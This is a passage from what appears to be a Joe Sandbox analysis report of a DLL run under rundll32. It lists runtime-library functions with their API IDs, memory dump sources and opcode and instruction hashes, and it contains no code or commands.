                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0be1fb5e2f1216bc1b940a859d571dac6121c46e0836de7767b4ce6883e4aeb3
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5414D32700F5888FB92CBA4E8513ED2371BB5C7C8F959125EE092BB95DF78864AC340
                                                                                                                                                                                                                            Function 000000018000F874 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                            • Opcode ID: 220969f90f81ea5a491faac75346ba19894adf6be773f5f6384549e35cdde0f7
                                                                                                                                                                                                                            • Instruction ID: 5e4ab2c16c99f6d0b16bc80479f9834d0d63f7ea8ea22c137d887cbb2cd0e6bc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 220969f90f81ea5a491faac75346ba19894adf6be773f5f6384549e35cdde0f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0217131212A0591EEA6CB56A4007B97294BB4CBF0F59C735BE2957BD5EF38CA499300
                                                                                                                                                                                                                            Function 000000018000FABC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60libraryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                            • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                            • Opcode ID: a289e550c52b847aac57570cc03b00b5a0ebd41078ac3d3d573d834e8681df30
                                                                                                                                                                                                                            • Instruction ID: a95981d2bde028957cb7d6165ac678c66b686b579846189090f2e31615455093
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a289e550c52b847aac57570cc03b00b5a0ebd41078ac3d3d573d834e8681df30
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7218E32215B4881EAA6DB5694103B533A4EB8CFF0F5C9335AE2987BD0DF38C6098740
                                                                                                                                                                                                                            Function 000000018003FF44 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                            • Opcode ID: 30848afdadcb297948af538131b5f5178555a04d7eb4f77c05f8b310286a30c0
                                                                                                                                                                                                                            • Instruction ID: c7829849b2f168159db765faf0b81d1f3368c8563c0f8ad31c6079f03d2a3549
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30848afdadcb297948af538131b5f5178555a04d7eb4f77c05f8b310286a30c0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 24F06271211B0881EBA28B24E8443BB6360AB4D7E1F648725FA69463E4CF6EC24D8700
                                                                                                                                                                                                                            Function 0000000180007930 Relevance: 7.8, APIs: 5, Instructions: 326threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                                                            • Opcode ID: 22161daed3c2e48cfb6a2128a24651a7aeaf3e7c08b61552abfb125deb73946f
                                                                                                                                                                                                                            • Instruction ID: 3c6318098b6a105b45b44d24200d3ea19cec9be78bcf65ec60f6a028176840a5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 22161daed3c2e48cfb6a2128a24651a7aeaf3e7c08b61552abfb125deb73946f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2602CB32619B8486E7A1CB55E4947AAB7B0F3D8794F108016FACE47BA9DF7DC548CB00
                                                                                                                                                                                                                            Function 000000018000C1F8 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                            • Opcode ID: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                            • Instruction ID: 135fc376b1a8cfedf6fd7dae04e6b903f416e55d44e7b02af783c7e71b4be7be
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26B19332216A4881EAE7DB559480BFD77A0EB5CBC4F09C426BE4A47785DF38C74AC742
                                                                                                                                                                                                                            Function 00000001800152B4 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::$Name::operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 826178784-0
                                                                                                                                                                                                                            • Opcode ID: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                            • Instruction ID: dc3e5c478041bf289d860fee317c83415d36c744b4e48cd64d64fa13d1e4a70b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77416B36201E58D8EB92CB61E8903EC37B4B719BC5FA48016EAA95B395DF75C759C300
                                                                                                                                                                                                                            Function 00000001800419D0 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 00000001800419EF
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A0E
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A36
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A47
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A58
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                            • Instruction ID: e93ad22c6cc443ae94773b33ba4779df2cc7973ffbf2f88c150105d93498b686
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00118E30205E4845FADA672195D63FD22417B4C7F9F0AC724B83A066D6EE28CB29574A
                                                                                                                                                                                                                            Function 0000000180041520 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                            • Instruction ID: 894476b8d09a22a5dbe3d770f39793525e4cc36c43d7413f8e4abc8b3aeea73a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C1115470314E0985FADAA73554E27FD12816B8C7F9F19CB24B936062C6ED38CB486749
                                                                                                                                                                                                                            Function 0000000180041864 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                            • Instruction ID: e86eebddfadbf209218566a74c72582cf7fff1bf59de2877caf13f980550ab1d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 830f67e147a0935bcec4e640bc060abaaf3c4469f6951c3d39c6dccd234fcab0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B113030204E0D09FADB632144A67FD12416F4D3FEF1ACB28B8350A2C2ED389B096799
                                                                                                                                                                                                                            Function 0000000180041480 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3702945584-0
                                                                                                                                                                                                                            • Opcode ID: 43b698f3bd72d782d1a4c4367ab40e0fd6e179516ccf90768e29b969fcb783f7
                                                                                                                                                                                                                            • Instruction ID: 586806abb7160c1286a1b2c9858a8c81ad64b0ece563cba21c458cc6968070c5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43b698f3bd72d782d1a4c4367ab40e0fd6e179516ccf90768e29b969fcb783f7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21110C30604E0949FADB637144A67FD11417F8D3FEF1ACB24B836062D2EE289B096789
                                                                                                                                                                                                                            Function 000000018000D56C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                            • Opcode ID: 09b6cd871ff89506528b68077a13dcbbaff50fd9b0353c15b1e87b0f63462aad
                                                                                                                                                                                                                            • Instruction ID: 603ec2f23fa6d6c6a25bd3aeda4f846d3f0b7b81b5b2ff33ca2fe6bf8accc470
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09b6cd871ff89506528b68077a13dcbbaff50fd9b0353c15b1e87b0f63462aad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63917F73614B888AE792DB65E8903DD7BA0F3497C8F14811AFB8957755DF38C299CB00
                                                                                                                                                                                                                            Function 000000018000D2FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                            • Opcode ID: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                            • Instruction ID: dfb6a33e339ab0c6007a7a63b5c9da813757f51a8917a400a443b559987f5a56
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 087e7b3c63a88a435a2e6d937ad598ea21859f3271ec1f8e9716eed55fe6bc31
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43615032508BC886E7A2DF15E4407DAB7A0F7897D8F048216FB9857B95DF78D298CB10
                                                                                                                                                                                                                            Function 000000018000DAEC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000003.00000002.1376798252.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376766547.0000000180000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376855594.000000018005F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376908401.0000000180073000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376933433.0000000180074000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376953166.0000000180077000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1376978030.000000018007C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000003.00000002.1377010947.000000018007D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm$csm
                                                                                                                                                                                                                            • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                            • Opcode ID: 5368d8b1d24fe0368cc4e10c75a835cf7b4598258ec1be9622bc0c1957234e7a
